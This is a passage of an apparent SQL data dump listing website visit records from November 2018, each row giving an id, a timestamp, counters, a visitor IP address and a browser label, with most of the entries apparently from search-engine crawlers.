0,'54.36.148.210','other'),(331996,1542226273,10,10,0,0,'66.249.66.57','chrome'),(331997,1542226282,3,3,0,0,'66.249.66.42','chrome'),(331998,1542226291,8,8,0,0,'66.249.66.40','chrome'),(331999,1542226332,2,2,0,0,'66.249.66.59','chrome'),(332000,1542226460,1,1,0,0,'54.36.149.53','other'),(332001,1542226573,1,1,0,0,'54.36.149.57','other'),(332002,1542226667,1,1,0,0,'207.46.13.169','other'),(332003,1542226784,1,1,0,0,'54.36.149.68','other'),(332004,1542227018,1,1,0,0,'54.36.149.69','other'),(332005,1542227022,3,3,0,0,'216.244.66.241','other'),(332006,1542227053,2,2,0,0,'66.249.66.152','chrome'),(332007,1542227110,1,1,0,0,'95.163.255.103','other'),(332008,1542227116,1,1,0,0,'95.163.255.115','other'),(332009,1542227461,1,1,0,0,'54.36.149.43','other'),(332010,1542227555,1,1,0,0,'46.229.168.140','other'),(332011,1542227559,1,1,0,0,'46.229.168.150','other'),(332012,1542228192,1,1,0,0,'178.154.244.29','other'),(332013,1542228358,1,1,0,0,'159.65.125.154','chrome'),(332014,1542228394,1,1,0,0,'46.229.168.142','other'),(332015,1542228445,3,3,0,0,'66.249.66.59','chrome'),(332017,1542228458,2,2,0,0,'66.249.66.42','chrome'),(332018,1542228467,5,5,0,0,'66.249.66.57','chrome'),(332020,1542228481,4,4,0,0,'66.249.66.40','chrome'),(332021,1542228490,6,6,0,0,'66.249.66.156','chrome'),(332022,1542228491,4,4,0,0,'66.249.66.152','chrome'),(332023,1542228569,1,1,0,0,'54.36.148.166','other'),(332024,1542228657,4,4,0,0,'66.249.66.154','chrome'),(332025,1542228691,1,1,0,0,'54.36.148.73','other'),(332026,1542229181,7,7,0,0,'178.154.244.11','other'),(332027,1542229188,1,1,0,0,'141.8.142.103','other'),(332028,1542229191,5,5,0,0,'178.154.244.29','other'),(332029,1542229245,1,1,0,0,'54.36.149.47','other'),(332030,1542229282,1,1,0,0,'54.36.148.35','other'),(332031,1542229372,1,1,0,0,'54.36.149.53','other'),(332032,1542229383,2,2,0,0,'66.249.66.157','chrome'),(332033,1542229398,3,3,0,0,'66.249.66.156','chrome'),(332034,1542229421,2,2,0,0,'66.249.66.152','chrome'),(332035,1542229488,3,3,0,0,'216.244.66.241','other'),(332036,1542229699,2,2,0,0,'5.45.207.79','other'),(332037,1542229767,1,1,0,0,'54.36.148.237','other'),(332038,1542229791,1,1,0,0,'54.36.148.47','other'),(332039,1542230033,1,1,0,0,'66.249.66.154','chrome'),(332040,1542230166,1,1,0,0,'54.36.148.139','other'),(332041,1542230197,1,1,0,0,'178.154.171.27','other'),(332042,1542230313,3,3,0,0,'178.154.244.11','other'),(332043,1542230384,1,1,0,0,'37.9.113.148','other'),(332044,1542230412,1,1,0,0,'87.250.224.107','other'),(332045,1542230506,1,1,0,0,'178.154.244.29','other'),(332046,1542230549,1,1,0,0,'216.244.66.241','other'),(332047,1542230708,1,1,0,0,'207.46.13.169','other'),(332048,1542230792,2,2,0,0,'207.46.13.207','other'),(332049,1542230799,1,1,0,0,'66.249.93.205','chrome'),(332050,1542230801,1,1,0,0,'66.249.93.218','chrome'),(332051,1542230958,1,1,0,0,'207.46.13.172','other'),(332052,1542231096,2,2,0,0,'157.55.39.212','other'),(332053,1542231534,1,1,0,0,'46.229.168.146','other'),(332054,1542231656,7,7,0,0,'66.249.66.152','chrome'),(332055,1542231733,3,3,0,0,'66.249.66.156','chrome'),(332056,1542231752,1,1,0,0,'46.229.168.144','other'),(332057,1542231854,1,1,0,0,'66.249.66.154','chrome'),(332058,1542231931,2,2,0,0,'207.46.13.169','other'),(332059,1542232084,2,2,0,0,'216.244.66.241','other'),(332060,1542232099,1,1,0,0,'82.145.208.70','other'),(332061,1542232314,1,1,0,0,'207.46.13.207','other'),(332062,1542232552,1,1,0,0,'207.46.13.172','other'),(332063,1542232661,1,1,0,0,'40.77.167.222','other'),(332064,1542233018,1,1,0,0,'66.249.66.156','chrome'),(332065,1542233354,2,2,0,0,'66.249.66.155','chrome'),(332066,1542233355,1,1,0,0,'66.249.66.154','chrome'),(332067,1542233672,1,1,0,0,'5.45.207.19','other'),(332068,1542233673,1,1,0,0,'178.154.244.11','other'),(332069,1542233676,2,2,0,0,'178.154.244.29','other'),(332070,1542233688,1,1,0,0,'46.229.168.132','other'),(332071,1542234357,1,1,0,0,'8.29.198.27','other'),(332072,1542234967,2,2,0,0,'216.244.66.241','other'),(332073,1542235627,2,2,0,0,'66.249.66.152','chrome'),(332074,1542235780,1,1,0,0,'54.36.149.51','other'),(332075,1542235834,1,1,0,0,'8.29.198.26','other'),(332076,1542235854,1,1,0,0,'54.36.148.28','other'),(332077,1542235901,1,1,0,0,'46.229.168.142','other'),(332078,1542235954,1,1,0,0,'207.46.13.169','other'),(332079,1542236173,1,1,0,0,'46.229.168.150','other'),(332080,1542236176,1,1,0,0,'46.229.168.135','other'),(332081,1542236434,1,1,0,0,'8.29.198.27','other'),(332082,1542237063,5,5,0,0,'216.244.66.241','other'),(332083,1542237106,1,1,0,0,'66.249.66.156','chrome'),(332084,1542237124,1,1,0,0,'54.36.148.108','other'),(332085,1542237151,1,1,0,0,'54.36.148.217','other'),(332086,1542237526,3,3,0,0,'178.154.244.29','other'),(332087,1542237530,3,3,0,0,'178.154.244.11','other'),(332088,1542237652,1,1,0,0,'95.163.255.95','other'),(332089,1542237661,1,1,0,0,'95.163.255.92','other'),(332090,1542237759,9,9,0,0,'5.9.97.200','other'),(332091,1542237841,1,1,0,0,'54.36.149.101','other'),(332092,1542237926,1,1,0,0,'54.36.149.87','other'),(332093,1542237943,1,1,0,0,'54.36.148.237','other'),(332094,1542238271,1,1,0,0,'54.36.148.182','other'),(332095,1542239282,1,1,0,0,'46.229.168.151','other'),(332096,1542239742,1,1,0,0,'87.120.36.157','other'),(332097,1542239744,1,1,0,0,'109.70.100.19','other'),(332098,1542239935,2,2,0,0,'216.244.66.241','other'),(332099,1542239960,1,1,0,0,'46.229.168.143','other'),(332100,1542240383,1,1,0,0,'66.249.66.157','chrome'),(332101,1542240412,1,1,0,0,'66.249.66.154','chrome'),(332102,1542240781,1,1,0,0,'46.229.168.146','other'),(332103,1542240782,1,1,0,0,'46.229.168.136','other'),(332104,1542241573,1,1,0,0,'46.229.168.130','other'),(332105,1542241581,1,1,0,0,'66.249.66.59','chrome'),(332106,1542241598,1,1,0,0,'66.249.66.40','chrome'),(332107,1542242441,5,5,0,0,'216.244.66.241','other'),(332108,1542243012,1,1,0,0,'66.249.66.154','chrome'),(332109,1542243241,1,1,0,0,'46.166.186.228','other'),(332110,1542243410,8,8,0,0,'204.12.226.26','other'),(332111,1542243786,1,1,0,0,'46.229.168.144','other'),(332112,1542244433,2,2,0,0,'46.229.168.152','other'),(332113,1542244558,1,1,0,0,'46.229.168.141','other'),(332114,1542245200,1,1,0,0,'8.29.198.25','other'),(332115,1542245346,4,4,0,0,'216.244.66.241','other'),(332116,1542245450,1,1,0,0,'207.46.13.169','other'),(332117,1542246298,1,0,1,0,'66.249.66.152',''),(332118,1542246673,1,1,0,0,'46.229.168.139','other'),(332119,1542246677,1,1,0,0,'46.229.168.130','other'),(332120,1542246686,1,1,0,0,'8.29.198.27','other'),(332121,1542247231,1,1,0,0,'46.229.168.133','other'),(332122,1542247272,1,1,0,0,'8.29.198.25','other'),(332123,1542247308,4,4,0,0,'216.244.66.241','other'),(332124,1542247628,12,12,0,0,'178.154.244.29','other'),(332125,1542247787,9,9,0,0,'178.154.244.11','other'),(332126,1542247835,1,1,0,0,'5.45.207.19','other'),(332127,1542248196,2,2,0,0,'5.45.207.79','other'),(332128,1542248684,2,2,0,0,'178.154.244.29','other'),(332129,1542248712,1,1,0,0,'54.36.148.115','other'),(332130,1542248735,1,1,0,0,'54.36.148.36','other'),(332131,1542248955,1,1,0,0,'46.229.168.147','other'),(332132,1542249019,1,1,0,0,'54.36.148.44','other'),(332133,1542249169,2,2,0,0,'178.154.244.11','other'),(332134,1542249176,1,1,0,0,'54.36.148.175','other'),(332135,1542249256,1,1,0,0,'54.36.148.85','other'),(332136,1542249408,1,1,0,0,'54.36.149.16','other'),(332137,1542249641,1,1,0,0,'102.165.37.114','other'),(332138,1542249706,1,1,0,0,'54.36.148.52','other'),(332139,1542249803,1,1,0,0,'207.46.13.169','other'),(332140,1542249932,1,1,0,0,'54.36.148.104','other'),(332141,1542249983,1,1,0,0,'54.36.148.37','other'),(332142,1542250051,1,1,0,0,'46.229.168.153','other'),(332143,1542250052,1,1,0,0,'46.229.168.151','other'),(332144,1542250057,1,1,0,0,'54.36.148.132','other'),(332145,1542250150,1,1,0,0,'157.55.39.212','other'),(332146,1542250183,1,1,0,0,'54.36.149.63','other'),(332147,1542250185,1,1,0,0,'46.229.168.135','other'),(332148,1542250188,1,1,0,0,'46.229.168.133','other'),(332149,1542250191,9,9,0,0,'216.244.66.241','other'),(332150,1542250395,1,1,0,0,'54.36.148.102','other'),(332151,1542250441,2,2,0,0,'34.219.20.111','chrome'),(332152,1542250693,1,1,0,0,'54.36.148.123','other'),(332153,1542250786,1,1,0,0,'54.36.149.11','other'),(332154,1542250941,1,1,0,0,'54.36.148.199','other'),(332155,1542250945,1,1,0,0,'54.36.149.47','other'),(332156,1542250969,1,1,0,0,'66.249.66.157','chrome'),(332157,1542251012,1,1,0,0,'66.249.66.154','chrome'),(332158,1542251047,1,1,0,0,'54.36.148.109','other'),(332159,1542251220,1,1,0,0,'54.36.148.241','other'),(332160,1542251284,1,1,0,0,'46.229.168.152','other'),(332161,1542251290,1,1,0,0,'54.36.149.94','other'),(332162,1542251541,1,1,0,0,'54.36.149.76','other'),(332163,1542251556,1,1,0,0,'54.36.148.147','other'),(332164,1542251579,1,1,0,0,'54.36.148.253','other'),(332165,1542251823,1,1,0,0,'54.36.148.96','other'),(332166,1542251834,1,1,0,0,'54.36.148.92','other'),(332167,1542251891,1,1,0,0,'54.36.148.174','other'),(332168,1542251907,1,1,0,0,'54.36.148.35','other'),(332169,1542252074,1,1,0,0,'54.36.149.43','other'),(332170,1542252078,1,1,0,0,'54.36.148.75','other'),(332171,1542252119,1,1,0,0,'54.36.148.166','other'),(332172,1542252191,1,1,0,0,'54.36.148.182','other'),(332173,1542252254,1,1,0,0,'54.36.148.10','other'),(332174,1542252260,1,1,0,0,'54.36.149.73','other'),(332175,1542252387,1,1,0,0,'54.36.148.12','other'),(332176,1542252723,3,3,0,0,'216.244.66.241','other'),(332177,1542252728,1,1,0,0,'40.77.167.194','other'),(332178,1542252824,1,1,0,0,'46.229.168.130','other'),(332179,1542252839,1,1,0,0,'54.36.148.29','other'),(332180,1542253091,1,1,0,0,'54.36.149.55','other'),(332181,1542253129,1,1,0,0,'54.36.148.235','other'),(332182,1542253159,1,1,0,0,'54.36.148.21','other'),(332183,1542253434,1,1,0,0,'54.36.148.73','other'),(332184,1542253544,1,1,0,0,'54.36.148.163','other'),(332185,1542253621,1,1,0,0,'54.36.148.248','other'),(332186,1542253800,1,1,0,0,'139.81.121.111','chrome'),(332187,1542253802,1,1,0,0,'173.211.127.234','chrome'),(332188,1542253837,1,1,0,0,'207.46.13.169','other'),(332189,1542253852,3,3,0,0,'157.55.39.212','other'),(332190,1542253858,1,1,0,0,'46.229.168.129','other'),(332191,1542253860,2,2,0,0,'46.229.168.137','other'),(332192,1542253974,1,1,0,0,'54.36.148.231','other'),(332193,1542254071,1,1,0,0,'46.229.168.145','other'),(332194,1542254072,1,1,0,0,'54.36.148.253','other'),(332195,1542254092,1,1,0,0,'46.229.168.140','other'),(332196,1542254154,4,4,0,0,'216.244.66.241','other'),(332197,1542254206,1,1,0,0,'178.154.244.11','other'),(332198,1542254241,1,1,0,0,'178.154.244.29','other'),(332199,1542254440,1,1,0,0,'54.36.148.64','other'),(332200,1542254457,1,1,0,0,'54.36.148.104','other'),(332201,1542254631,1,1,0,0,'54.36.148.69','other'),(332202,1542254705,1,1,0,0,'66.249.66.59','chrome'),(332204,1542254833,1,1,0,0,'54.36.149.54','other'),(332205,1542254851,1,1,0,0,'54.36.148.181','other'),(332206,1542254873,1,1,0,0,'54.36.149.29','other'),(332207,1542254955,1,1,0,0,'66.249.66.156','chrome'),(332209,1542255056,1,1,0,0,'54.36.148.155','other'),(332210,1542255057,3,3,0,0,'216.244.66.241','other'),(332211,1542255115,1,1,0,0,'207.46.13.169','other'),(332212,1542255532,1,1,0,0,'54.36.148.228','other'),(332213,1542255584,1,1,0,0,'54.36.148.247','other'),(332214,1542255624,1,1,0,0,'54.36.148.125','other'),(332215,1542255643,1,1,0,0,'54.36.148.53','other'),(332216,1542255735,2,2,0,0,'46.211.26.119','chrome'),(332217,1542255975,1,1,0,0,'66.249.93.91','chrome'),(332219,1542256044,1,1,0,0,'8.29.198.25','other'),(332220,1542256057,1,1,0,0,'54.36.148.154','other'),(332221,1542256104,1,1,0,0,'180.76.15.10','other'),(332222,1542256105,1,1,0,0,'180.76.15.161','other'),(332223,1542256213,1,1,0,0,'54.36.149.52','other'),(332224,1542256340,3,3,0,0,'157.55.39.212','other'),(332225,1542256440,1,1,0,0,'54.36.148.44','other'),(332226,1542256740,2,2,0,0,'46.229.168.132','other'),(332227,1542256743,1,1,0,0,'46.229.168.136','other'),(332228,1542256855,1,1,0,0,'54.36.148.26','other'),(332229,1542256896,1,1,0,0,'54.36.149.55','other'),(332230,1542256963,1,1,0,0,'54.36.148.157','other'),(332231,1542256975,1,1,0,0,'54.36.149.44','other'),(332232,1542257004,1,1,0,0,'54.36.148.73','other'),(332233,1542257008,1,1,0,0,'54.36.149.27','other'),(332234,1542257136,1,1,0,0,'54.36.149.80','other'),(332235,1542257181,1,1,0,0,'207.46.13.169','other'),(332236,1542257198,1,1,0,0,'95.163.255.64','other'),(332237,1542257200,1,1,0,0,'95.163.255.65','other'),(332238,1542257230,1,1,0,0,'54.36.149.52','other'),(332239,1542257297,1,1,0,0,'54.36.148.68','other'),(332240,1542257369,1,1,0,0,'54.36.148.213','other'),(332241,1542257371,1,1,0,0,'54.36.148.67','other'),(332242,1542257520,2,2,0,0,'8.29.198.25','other'),(332243,1542257585,1,1,0,0,'207.46.13.207','other'),(332244,1542257604,1,1,0,0,'46.229.168.150','other'),(332245,1542257640,1,1,0,0,'54.36.149.3','other'),(332246,1542257684,3,3,0,0,'216.244.66.241','other'),(332247,1542257727,1,1,0,0,'54.36.148.30','other'),(332248,1542257885,1,1,0,0,'54.36.148.166','other'),(332249,1542257892,1,1,0,0,'54.36.149.39','other'),(332250,1542257942,1,1,0,0,'54.36.148.182','other'),(332251,1542258028,1,1,0,0,'54.36.148.21','other'),(332252,1542258060,1,1,0,0,'54.36.148.71','other'),(332253,1542258141,1,1,0,0,'157.55.39.212','other'),(332254,1542258182,1,1,0,0,'54.36.149.40','other'),(332255,1542258331,1,1,0,0,'54.36.148.20','other'),(332256,1542258412,1,1,0,0,'54.36.148.122','other'),(332257,1542258441,1,1,0,0,'54.36.149.47','other'),(332258,1542258471,1,1,0,0,'54.36.149.43','other'),(332259,1542258495,1,1,0,0,'54.36.148.154','other'),(332260,1542258566,1,1,0,0,'207.46.13.172','other'),(332261,1542258604,1,1,0,0,'216.244.66.241','other'),(332262,1542258612,1,1,0,0,'95.163.255.93','other'),(332263,1542258613,1,1,0,0,'95.163.255.95','other'),(332264,1542258616,1,1,0,0,'95.163.255.92','other'),(332265,1542258618,1,1,0,0,'95.163.255.96','other'),(332266,1542258669,1,1,0,0,'54.36.149.77','other'),(332267,1542258674,1,1,0,0,'54.36.148.172','other'),(332268,1542258688,1,1,0,0,'54.36.148.112','other'),(332269,1542258785,1,1,0,0,'54.36.148.242','other'),(332270,1542258835,1,1,0,0,'54.36.149.102','other'),(332271,1542259038,2,2,0,0,'207.46.13.169','other'),(332272,1542259140,1,1,0,0,'157.55.39.212','other'),(332273,1542259276,1,1,0,0,'54.36.148.231','other'),(332274,1542259285,1,1,0,0,'54.36.149.0','other'),(332275,1542259307,1,1,0,0,'207.46.13.207','other'),(332276,1542259479,1,1,0,0,'54.36.149.2','other'),(332277,1542259516,1,1,0,0,'54.36.148.74','other'),(332278,1542259708,1,1,0,0,'54.36.148.208','other'),(332279,1542259773,1,1,0,0,'54.36.148.13','other'),(332280,1542259864,1,1,0,0,'54.36.148.88','other'),(332281,1542259868,1,1,0,0,'54.36.148.200','other'),(332282,1542259910,6,6,0,0,'216.244.66.241','other'),(332283,1542260029,1,1,0,0,'54.36.148.209','other'),(332284,1542260068,1,1,0,0,'54.36.148.167','other'),(332285,1542260287,1,1,0,0,'54.36.148.64','other'),(332287,1542260296,1,1,0,0,'54.36.148.37','other'),(332288,1542260388,1,1,0,0,'54.36.148.180','other'),(332289,1542260433,1,1,0,0,'54.36.148.233','other'),(332290,1542260477,1,1,0,0,'54.36.149.87','other'),(332291,1542260490,1,1,0,0,'54.36.149.7','other'),(332292,1542260584,1,1,0,0,'54.36.148.195','other'),(332293,1542260626,1,1,0,0,'54.36.148.111','other'),(332294,1542260687,1,1,0,0,'54.36.148.49','other'),(332295,1542260695,1,1,0,0,'54.36.148.161','other'),(332296,1542260700,1,1,0,0,'54.36.148.148','other'),(332297,1542260914,1,1,0,0,'54.36.149.64','other'),(332298,1542260967,1,1,0,0,'54.36.148.123','other'),(332299,1542260978,1,1,0,0,'54.36.148.193','other'),(332300,1542261006,1,1,0,0,'54.36.149.77','other'),(332301,1542261202,1,1,0,0,'54.36.149.92','other'),(332302,1542261216,1,1,0,0,'54.36.148.223','other'),(332303,1542261264,8,8,0,0,'178.154.244.11','other'),(332304,1542261349,1,1,0,0,'54.36.148.10','other'),(332305,1542261360,1,1,0,0,'54.36.148.159','other'),(332306,1542261410,9,9,0,0,'178.154.244.29','other'),(332307,1542261449,1,1,0,0,'54.36.148.131','other'),(332308,1542261542,1,1,0,0,'54.36.149.29','other'),(332309,1542261544,2,2,0,0,'5.45.207.79','other'),(332310,1542261549,1,1,0,0,'54.36.149.84','other'),(332311,1542261733,1,1,0,0,'54.36.149.44','other'),(332312,1542261792,1,1,0,0,'54.36.149.70','other'),(332313,1542261830,1,1,0,0,'37.9.113.148','other'),(332314,1542261857,1,1,0,0,'87.250.224.65','other'),(332315,1542261914,1,1,0,0,'54.36.148.51','other'),(332316,1542261952,1,1,0,0,'54.36.148.37','other'),(332317,1542262007,1,1,0,0,'54.36.148.62','other'),(332318,1542262078,1,1,0,0,'54.36.148.188','other'),(332319,1542262157,1,1,0,0,'54.36.148.187','other'),(332320,1542262212,6,6,0,0,'178.154.244.11','other'),(332321,1542262293,2,2,0,0,'54.36.149.107','other'),(332322,1542262355,1,1,0,0,'54.36.148.135','other'),(332323,1542262388,8,8,0,0,'178.154.244.29','other'),(332324,1542262474,1,1,0,0,'46.229.168.144','other'),(332325,1542262475,1,1,0,0,'54.36.149.75','other'),(332326,1542262495,2,2,0,0,'87.250.224.47','other'),(332327,1542262565,7,7,0,0,'216.244.66.241','other'),(332328,1542262661,1,1,0,0,'54.36.148.214','other'),(332329,1542262666,1,1,0,0,'54.36.148.64','other'),(332330,1542262696,1,1,0,0,'5.45.207.19','other'),(332331,1542262914,1,1,0,0,'5.45.207.79','other'),(332332,1542262952,1,1,0,0,'54.36.148.224','other'),(332333,1542263088,1,1,0,0,'54.36.149.47','other'),(332334,1542263198,1,1,0,0,'54.36.148.149','other'),(332335,1542263234,1,1,0,0,'141.8.142.108','other'),(332336,1542263290,1,1,0,0,'46.229.168.135','other'),(332337,1542263292,1,1,0,0,'46.229.168.149','other'),(332338,1542263297,1,1,0,0,'178.154.244.11','other'),(332339,1542263311,2,2,0,0,'178.154.244.29','other'),(332340,1542263401,1,1,0,0,'54.36.148.192','other'),(332341,1542263446,1,1,0,0,'54.36.149.95','other'),(332342,1542263486,1,1,0,0,'54.36.148.18','other'),(332343,1542263615,1,1,0,0,'54.36.148.217','other'),(332344,1542263618,1,1,0,0,'54.36.149.100','other'),(332345,1542263793,1,1,0,0,'54.36.148.216','other'),(332346,1542263831,1,1,0,0,'54.36.148.11','other'),(332347,1542263838,4,4,0,0,'91.196.178.93','chrome'),(332348,1542263876,2,2,0,0,'54.36.148.152','other'),(332349,1542263877,1,1,0,0,'216.244.66.241','other'),(332350,1542263963,1,1,0,0,'54.36.148.41','other'),(332351,1542264040,1,1,0,0,'202.73.26.9','chrome'),(332352,1542264087,1,1,0,0,'54.36.148.33','other'),(332353,1542264269,1,1,0,0,'54.36.148.29','other'),(332354,1542264319,1,1,0,0,'54.36.148.31','other'),(332355,1542264425,1,1,0,0,'54.36.148.45','other'),(332356,1542264524,1,1,0,0,'54.36.148.206','other'),(332357,1542264578,1,1,0,0,'54.36.148.105','other'),(332358,1542264583,1,1,0,0,'54.36.148.102','other'),(332359,1542264605,1,1,0,0,'54.36.148.233','other'),(332360,1542264664,1,1,0,0,'54.36.149.28','other'),(332361,1542264754,1,1,0,0,'54.36.149.72','other'),(332362,1542264774,1,1,0,0,'54.36.148.68','other'),(332363,1542264776,1,1,0,0,'54.36.148.34','other'),(332364,1542264868,1,1,0,0,'157.55.39.212','other'),(332365,1542264879,2,2,0,0,'141.8.142.103','other'),(332366,1542264985,1,1,0,0,'54.36.148.84','other'),(332367,1542265080,1,1,0,0,'54.36.149.36','other'),(332368,1542265361,1,1,0,0,'54.36.148.191','other'),(332369,1542265443,1,1,0,0,'54.36.148.137','other'),(332370,1542265459,1,1,0,0,'54.36.148.100','other'),(332371,1542265460,6,6,0,0,'216.244.66.241','other'),(332372,1542265547,1,1,0,0,'54.36.149.42','other'),(332373,1542265698,1,1,0,0,'54.36.148.255','other'),(332374,1542265985,1,1,0,0,'54.36.149.86','other'),(332375,1542265999,1,1,0,0,'54.36.149.11','other'),(332376,1542266029,1,1,0,0,'54.36.148.53','other'),(332377,1542266068,1,1,0,0,'54.36.148.206','other'),(332378,1542266317,1,1,0,0,'54.36.148.153','other'),(332379,1542266337,1,1,0,0,'46.229.168.130','other'),(332380,1542266366,1,1,0,0,'216.244.66.241','other'),(332381,1542266395,1,0,1,0,'66.249.66.40',''),(332382,1542266420,4,4,0,0,'66.249.66.152','chrome'),(332383,1542266431,1,1,0,0,'46.229.168.141','other'),(332384,1542266434,1,1,0,0,'46.229.168.148','other'),(332385,1542266539,1,1,0,0,'66.249.66.156','chrome'),(332386,1542266594,3,3,0,0,'66.249.66.40','chrome'),(332387,1542266615,1,1,0,0,'54.36.148.103','other'),(332388,1542266630,1,1,0,0,'54.36.148.61','other'),(332389,1542266636,1,1,0,0,'66.249.66.57','chrome'),(332390,1542266692,3,3,0,0,'66.249.66.154','chrome'),(332391,1542266828,1,1,0,0,'207.46.13.207','other'),(332392,1542266885,1,1,0,0,'8.29.198.27','other'),(332393,1542266906,1,1,0,0,'54.36.148.85','other'),(332394,1542266932,1,1,0,0,'54.36.149.41','other'),(332395,1542266935,1,1,0,0,'54.36.148.14','other'),(332396,1542266970,1,1,0,0,'54.36.148.63','other'),(332397,1542267059,1,1,0,0,'54.36.148.219','other'),(332398,1542267117,1,1,0,0,'66.249.66.157','chrome'),(332399,1542267151,1,1,0,0,'54.36.148.78','other'),(332400,1542267229,1,1,0,0,'54.36.148.68','other'),(332401,1542267379,2,2,0,0,'5.138.178.20','chrome'),(332402,1542267389,1,1,0,0,'40.77.167.194','other'),(332403,1542267394,1,1,0,0,'40.77.167.222','other'),(332404,1542267441,3,3,0,0,'66.249.66.156','chrome'),(332405,1542267508,1,1,0,0,'54.36.148.201','other'),(332406,1542267527,1,1,0,0,'54.36.149.37','other'),(332407,1542267540,1,1,0,0,'66.249.66.152','chrome'),(332408,1542267555,1,1,0,0,'66.249.66.61','chrome'),(332409,1542267558,1,1,0,0,'66.249.66.44','chrome'),(332410,1542267575,1,1,0,0,'54.36.148.50','other'),(332411,1542267689,2,2,0,0,'207.46.13.235','other'),(332412,1542267692,1,1,0,0,'54.36.148.98','other'),(332413,1542267942,1,1,0,0,'54.36.148.60','other'),(332414,1542267970,11,11,0,0,'216.244.66.241','other'),(332415,1542267982,1,1,0,0,'54.36.148.153','other'),(332416,1542268149,1,1,0,0,'54.36.148.58','other'),(332417,1542268375,2,2,0,0,'8.29.198.26','other'),(332418,1542268390,1,1,0,0,'54.36.149.3','other'),(332419,1542268519,1,1,0,0,'54.36.148.143','other'),(332420,1542268563,2,2,0,0,'207.46.13.241','other'),(332421,1542268647,1,1,0,0,'54.36.148.91','other'),(332422,1542268714,2,2,0,0,'91.196.178.169','chrome'),(332423,1542268881,1,1,0,0,'216.244.66.241','other'),(332424,1542268948,1,1,0,0,'54.36.148.68','other'),(332425,1542269004,1,1,0,0,'54.36.149.65','other'),(332426,1542269062,1,1,0,0,'54.36.148.100','other'),(332427,1542269144,1,1,0,0,'54.36.148.159','other'),(332428,1542269203,1,1,0,0,'66.249.66.154','chrome'),(332429,1542269243,1,1,0,0,'54.36.148.237','other'),(332430,1542269377,1,1,0,0,'66.249.66.57','chrome'),(332432,1542269378,1,1,0,0,'54.36.148.255','other'),(332433,1542269406,1,1,0,0,'54.36.148.50','other'),(332434,1542269590,1,1,0,0,'46.229.168.134','other'),(332435,1542269643,1,1,0,0,'54.36.148.243','other'),(332436,1542269762,1,1,0,0,'54.36.148.11','other'),(332437,1542269786,1,1,0,0,'54.36.148.38','other'),(332438,1542269827,1,1,0,0,'95.163.255.94','other'),(332439,1542269831,1,1,0,0,'95.163.255.98','other'),(332440,1542269864,1,1,0,0,'207.46.13.207','other'),(332441,1542269865,1,1,0,0,'54.36.148.62','other'),(332442,1542269934,1,1,0,0,'54.36.149.44','other'),(332443,1542269947,1,1,0,0,'207.46.13.235','other'),(332444,1542269951,1,1,0,0,'40.77.167.194','other'),(332445,1542269956,2,2,0,0,'207.46.13.241','other'),(332446,1542269961,1,1,0,0,'40.77.167.222','other'),(332447,1542270181,1,1,0,0,'54.36.148.106','other'),(332448,1542270216,1,1,0,0,'54.36.148.108','other'),(332449,1542270325,1,1,0,0,'54.36.148.95','other'),(332450,1542270351,1,1,0,0,'157.55.39.212','other'),(332451,1542270595,4,4,0,0,'216.244.66.241','other'),(332452,1542270615,1,1,0,0,'54.36.149.11','other'),(332453,1542270719,1,1,0,0,'54.36.148.87','other'),(332454,1542270886,1,1,0,0,'54.36.148.27','other'),(332455,1542270959,1,1,0,0,'54.36.149.59','other'),(332456,1542271132,1,1,0,0,'54.36.149.22','other'),(332457,1542271140,1,1,0,0,'207.46.13.235','other'),(332458,1542271356,1,1,0,0,'46.229.168.137','other'),(332459,1542271359,1,1,0,0,'46.229.168.144','other'),(332460,1542271412,1,1,0,0,'54.36.148.140','other'),(332461,1542271435,1,1,0,0,'66.249.66.156','chrome'),(332462,1542271442,1,1,0,0,'207.46.13.241','other'),(332463,1542271481,1,1,0,0,'54.36.148.62','other'),(332464,1542271550,1,1,0,0,'54.36.149.86','other'),(332465,1542271566,1,1,0,0,'54.36.149.48','other'),(332466,1542271766,1,1,0,0,'54.36.149.50','other'),(332467,1542271770,1,1,0,0,'54.36.148.71','other'),(332468,1542271809,1,1,0,0,'207.46.13.169','other'),(332469,1542272121,1,1,0,0,'54.36.149.5','other'),(332470,1542272162,1,1,0,0,'54.36.148.59','other'),(332471,1542272230,1,1,0,0,'54.36.149.96','other'),(332472,1542272243,1,1,0,0,'46.133.226.191','other'),(332473,1542272320,1,1,0,0,'54.36.148.210','other'),(332474,1542272365,1,1,0,0,'54.36.148.187','other'),(332475,1542272387,1,1,0,0,'54.36.149.90','other'),(332476,1542272439,1,1,0,0,'54.36.148.190','other'),(332477,1542272447,1,1,0,0,'54.36.149.69','other'),(332478,1542272459,1,1,0,0,'54.36.148.53','other'),(332479,1542272470,1,1,0,0,'54.36.148.64','other'),(332480,1542272536,1,1,0,0,'54.36.148.33','other'),(332481,1542272541,3,3,0,0,'91.196.178.178','chrome'),(332482,1542272606,2,2,0,0,'66.249.66.156','chrome'),(332483,1542272785,1,1,0,0,'54.36.149.31','other'),(332484,1542272804,1,1,0,0,'54.36.148.122','other'),(332485,1542272869,1,1,0,0,'54.36.149.17','other'),(332486,1542272924,1,1,0,0,'54.36.148.162','other'),(332487,1542273039,4,4,0,0,'216.244.66.241','other'),(332488,1542273063,1,1,0,0,'54.36.148.71','other'),(332489,1542273070,1,1,0,0,'54.36.148.244','other'),(332490,1542273098,1,1,0,0,'66.249.66.44','chrome'),(332491,1542273287,1,1,0,0,'54.36.149.18','other'),(332492,1542273321,1,1,0,0,'37.53.228.75','chrome'),(332493,1542273357,1,1,0,0,'54.36.149.76','other'),(332494,1542273382,1,1,0,0,'54.36.148.242','other'),(332495,1542273633,1,1,0,0,'54.36.148.57','other'),(332496,1542273786,1,1,0,0,'54.36.149.77','other'),(332497,1542273844,1,1,0,0,'54.36.148.121','other'),(332498,1542273967,1,1,0,0,'154.16.138.18','other'),(332499,1542274080,1,1,0,0,'54.36.149.10','other'),(332500,1542274505,1,1,0,0,'54.36.148.51','other'),(332501,1542274553,2,2,0,0,'40.77.167.222','other'),(332502,1542274610,1,1,0,0,'54.36.148.13','other'),(332503,1542274659,1,1,0,0,'54.36.149.41','other'),(332504,1542274676,1,1,0,0,'54.36.148.19','other'),(332505,1542274868,1,1,0,0,'207.46.13.207','other'),(332506,1542274971,2,2,0,0,'91.196.178.93','chrome'),(332507,1542274972,1,1,0,0,'54.36.149.33','other'),(332508,1542275013,1,1,0,0,'54.36.148.208','other'),(332509,1542275138,1,1,0,0,'54.36.149.27','other'),(332510,1542275145,2,2,0,0,'207.46.13.235','other'),(332511,1542275150,1,1,0,0,'207.46.13.241','other'),(332512,1542275305,1,1,0,0,'54.36.149.65','other'),(332513,1542275365,1,1,0,0,'54.36.149.93','other'),(332514,1542275367,1,1,0,0,'54.36.148.98','other'),(332515,1542275372,1,1,0